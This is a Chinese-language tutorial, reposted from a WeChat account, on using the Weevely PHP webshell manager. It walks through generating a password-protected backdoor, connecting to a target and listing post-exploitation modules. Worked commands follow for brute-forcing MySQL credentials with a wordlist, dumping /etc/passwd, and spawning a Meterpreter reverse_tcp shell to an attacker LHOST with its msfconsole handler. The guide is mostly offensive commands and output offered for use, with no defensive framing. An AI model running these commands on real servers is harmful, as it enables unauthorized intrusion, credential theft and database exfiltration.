专栏首页HACKWAYWeevely入手指南

Weevely入手指南

Weevely是一款python编写的webshell管理工具,作为编写语言使用python的一款工具,它最大的优点就在于跨平台,可以算作是linux下的一款菜刀替代工具(限于php),总的来说还是非常不错的一款工具,具体的项目地址[1]

基本用法

root@kali:~# weevely

[+] weevely 3.2.0
[!] Error: too few arguments

[+] Run terminal to the target
    weevely <URL> <password> [cmd]

[+] Load session file
    weevely session <path> [cmd]

[+] Generate backdoor agent
    weevely generate <password> <path>

生成一个后门

root@kali:~# weevely generate test hello.php
Generated backdoor with password 'test' in 'hello.php' of 1486 byte size.
root@kali:~# find / -name hello.php
/usr/share/weevely/hello.php

目前支持的后门格式主要是php :generate.php(生成php后门文件) :generate.img(将后门代码插入到图片中,并修改.htaccess,该后门需要服务器开启.htaccess) :generate.htaccess(将后门代码插入到.htaccess,同样需要开启.htaccess支持)

连接一个后门

root@kali:~# weevely http://192.168.110.129/hello.php test

[+] weevely 3.2.0

[+] Target: winxp-0947be9ad:C:\phpstudy\WWW
[+] Session:    /root/.weevely/sessions/192.168.110.129/hello_0.session
[+] Shell:  System shell

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely>shell

在虚拟终端模式下需要使用模块直接在前面加上 ’:’ 即可,或者用:help查看帮助详情

module

description

:audit.etcpasswd

枚举/etc/passwd

:audit.userfiles

列举用户/home下具有权限的文件

:audit.mapwebfiles

枚举任意Web站点的URL链接

:shell.php

编写php文件

:shell.sh

编写系统脚本

:system.info

收集系统信息

:find.suidsgid

查找SUID / SGID文件和目录

:find.perms

查找权限可读/写/可执行文件和目录

:backdoor.tcp

TCP端口后门

:backdoor.reversetcp

反弹TCP连接

:bruteforce.sql

爆破指定数据库用户名密码

:bruteforce.sqlusers

爆破所有数据库用户密码

:file.upload

上传本地文件

:file.upload2web

上传二进制/ ASCII文件至目标站点文件夹并枚举URL

:file.enum

在本地词表的书面枚举远程文件

:file.read

读文件

:file.rm

删除文件

:file.check

检查远程文件的状态(md5值,大小,权限等)

:file.download

下载远程二进制/ ASCII文件到本地

:sql.console

启动SQL控制台

:sql.dump

备份数据库,即脱库

:net.scan

端口扫描

:net.phpproxy

安装远程php代理

:net.ifaces

显示远程主机网络接口信息

:net.proxy

安装隧道通信代理

常用模块

  1. 暴力破解SQL用户凭证
用户名为roblast micjanost pjgomes pdpeers root
:bruteforce_sql mysql -users roblast micjanost pjgomes pdpeers root -fpwds wordlists/huge.txt

使用:sql_console连接数据库
www-data@target:/var/www/html PHP> :sql_console -u root -p Gilchrist
root@localhost SQL> show databases;
+--------------------+
| mysql              |
| performance_schema |
| test               |
| appdb              |
+--------------------+
root@localhost SQL>
  1. 绕过策略读取/etc/passwd
www-data@target:/var/www/html PHP> :audit_etcpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
yzer:x:1000:1000:yzer,,,:/home/yzer:/bin/bash
www-data@target:/var/www/html PHP>
  1. 反弹msf的shell
# 执行该命令会自动生成msf的payload
:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 10.0.0.2
[-][meterpreter] Make sure the listener is running on another terminal as below
msfconsole -x "use exploit/multi/handler; set PAYLOAD php/meterpreter/reverse_tcp; set LHOST 10.0.0.2;

参考资料

[1]

Weevely项目地址: "https://github.com/epinna/Weevely"

为你铺好的HACKWAY

长按扫码上车

你点的每个在看,我都认真当成了喜欢

本文分享自微信公众号 - HACKWAY(gh_7a5a315cde00),作者:HACKWAY

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-08-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • DC-1靶机渗透实操全过程,一起来玩吧!

    这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。靶机下载地址见文章底部标注[1]

    轩辕小子
  • DC-4靶机渗透实战

    这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。靶机下载地址:http://www.five86.com/dc-4.html

    轩辕小子
  • DC-5靶机渗透实战

    这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。靶机下载地址:http://www.five86.com/dc-5.html

    轩辕小子
  • django 两种视图模式FBV、CBV

    FBV(function base views)就是在视图函面使用函数处理请求 CBV(class base views)就是在视图里面使用类处理请求

    以谁为师
  • 一分钟学Python| Python的运算符 (上)

    运算符就是想数学中的加、减、乘,除的符号就是运算符,这次带大家来学习Python中的运算符中的运算符的介绍,因为内容过长,为了不违背 “一分钟“ 的原则,所以会...

    Python进击者
  • 大话JMeter4|不同的并发数可以自动化做压测吗?

    ​上节课爱画漫画的小哥哥用漫画形式向大家展示了JMeter的进阶用法:如何搭建InfluxDB,使用更炫酷的Grafana。

    霍格沃兹测试学院
  • 性能优化-测试Break能否对For循环起到优化作用

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明...

    cwl_java
  • 性能优化-多层嵌套for循环如何优化

    cwl_java
  • 菜鸟学Python——运算符

    经过较长时间的反思,准备整理第二版Python基础教程--菜鸟学Python,第二版会加上自己这一段时间来学习python过程中的一些感悟,走过的弯路,毕竟之前...

    PM小王
  • 没有Fundebug不能复现的BUG

    摘要:Fundebug的JavaScript监控插件更新至0.3.0,对用户行为记录功能进行了优化,可以记录console输出,并且记录HTTP请求花费的时间。...

    Fundebug

扫码关注云+社区

领取腾讯云代金券